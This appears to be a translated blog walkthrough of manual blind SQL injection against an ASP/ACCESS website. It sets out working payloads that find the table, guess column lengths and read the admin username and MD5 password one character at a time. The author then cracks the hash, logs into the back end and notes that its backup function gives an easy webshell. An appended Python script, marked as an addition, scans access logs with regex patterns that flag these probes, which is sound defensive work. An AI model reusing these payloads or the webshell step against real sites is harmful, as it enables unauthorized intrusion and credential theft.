1. and user>0 determines the database type (a tool would already have identified it, but to learn, we start from the most basic step).
When the echo shows a "Microsoft JET Database ***" error, we can conclude that it is an ACCESS database.
2. and exists (select * from Table Name): an error returned means the table name does not exist; a normal return means the specified table name exists.
Here we enter and exists (select * from admin)
The returned result is normal, indicating that admin exists.
3. and exists (select Column Name from Table Name): an error returned means the column name does not exist; a normal return means the column name exists.
Here we enter
and exists (select password from admin)
and exists (select adminname from admin)
Both return normally, so the table name and column names are settled.
4. and (select top 1 len (Column Name) from Table Name)> x guesses the length of the column value. x is a number: a normal return means the column length is greater than x, and an error return means the correct column length is x. Change the number after top to guess the length of the nth row of the column.
Here we enter and (select top 1 len (adminname) from admin)> 8. With 8 an error is returned and with 7 the page is normal, which shows that 8 is the column length.
5. and (select top 1 asc (mid (Column Name, N, 1)) from Table Name)> x is the key step: guessing the column contents. The number after top is the nth row of the column, N is the position of the character (digit or letter) within the column value, and x is an ASCII code. For example, if x = 50 is normal and 100 is an error, then 80 is normal; if 96 is normal and 97 is an error, the ASCII value is 97.
Here we enter: and (select top 1 asc (mid (adminname, 1, 1)) from admin)> 50
50 normal, 150 error, 125 error, 110 normal, 115 normal, 120 error, 118 normal, 119 error. This shows that the first character's ASCII value is 119, which converts to w.
According to the above method, the other 7 positions are guessed in turn and converted with a tool:
Second position: still 119 ---- w
Third position: 25 normal, 50 error, 48 ---- g
Fourth position: 48 ---- 0
Fifth position: 46 ---- .
Sixth position: 99 ---- c
Seventh position: 111 ---- o
Eighth position: 109 ---- m
The final adminname column value is wg00.com.
6. The contents of the remaining password column are obtained with the same method as above. However, this is tedious and requires patience, because passwords are generally stored MD5-encrypted, which requires many guesses. I guessed 16 characters this time; there should be other shortcuts, and I hope the experts will enlighten me.
and (select top 1 len (password) from admin)> 16 ---- 16-character MD5 encryption
The column length is 16, so it is a 16-character MD5 hash.
The final result of the password column is c6f4f454c781af4f. I went to an MD5 encryption/decryption website and looked it up; the result is the same as the user name: wg00.com. (It was hard going. Fortunately the MD5 could be decrypted; otherwise all that effort would have been in vain.)
7. Open the default management back end, enter the hard-won user name and password, and log in smoothly.
The back end has a data backup function, so a webshell is simple; the manual injection is also complete!
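From the defender's side, every step above leaves a recognisable trail in the web server log: a run of near-identical requests from one client that differ only in the compared number, with the response flipping between normal and error. The following script is an added example (not part of the original post) that scans constructed Apache-style access-log lines for the probe shapes of steps 1 to 5; the IPs, paths and log lines are all made up for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined style, trimmed); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /news.asp?id=7 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /news.asp?id=7%20and%20user%3E0 HTTP/1.1" 500 812
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /news.asp?id=7%20and%20exists(select%20*%20from%20admin) HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:04 +0000] "GET /news.asp?id=7%20and%20(select%20top%201%20len(adminname)%20from%20admin)%3E8 HTTP/1.1" 500 812
10.0.0.9 - - [01/Jan/2020:10:00:05 +0000] "GET /news.asp?id=7%20and%20(select%20top%201%20asc(mid(adminname,1,1))%20from%20admin)%3E50 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:06 +0000] "GET /news.asp?id=7%20and%20(select%20top%201%20asc(mid(adminname,1,1))%20from%20admin)%3E119 HTTP/1.1" 500 812
"""

# One pattern per step of the walkthrough; requests are URL-decoded and whitespace-normalised first.
PROBES = {
    "db_fingerprint": re.compile(r"\band\s+user\s*>\s*0\b", re.I),                   # step 1
    "table_or_column_exists": re.compile(r"\band\s+exists\s*\(\s*select\b", re.I),   # steps 2-3
    "column_length_guess": re.compile(r"\bselect\s+top\s+\d+\s+len\s*\(", re.I),     # step 4
    "char_by_char_guess": re.compile(r"\basc\s*\(\s*mid\s*\(", re.I),                # step 5
}

# Client IP, timestamp, request path and status code from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify_request(path):
    """Return the names of every probe pattern found in one request path."""
    decoded = re.sub(r"\s+", " ", unquote_plus(path))
    return [name for name, rx in PROBES.items() if rx.search(decoded)]

def scan_log(text):
    """Return (client_ip, status, probe_names) for each request that matches a probe."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, _ts, path, status = m.groups()
            probes = classify_request(path)
            if probes:
                hits.append((ip, int(status), probes))
    return hits

def suspicious_clients(hits, threshold=3):
    """IPs with at least `threshold` probe requests: the repeated, boolean-style
    guessing loop of steps 4 and 5 shows up as many such hits from one client."""
    counts = Counter(ip for ip, _status, _probes in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

In practice the same patterns can be fed to a WAF or SIEM rule, and the alternating 200/500 statuses from a single client are a stronger signal than any one request on its own.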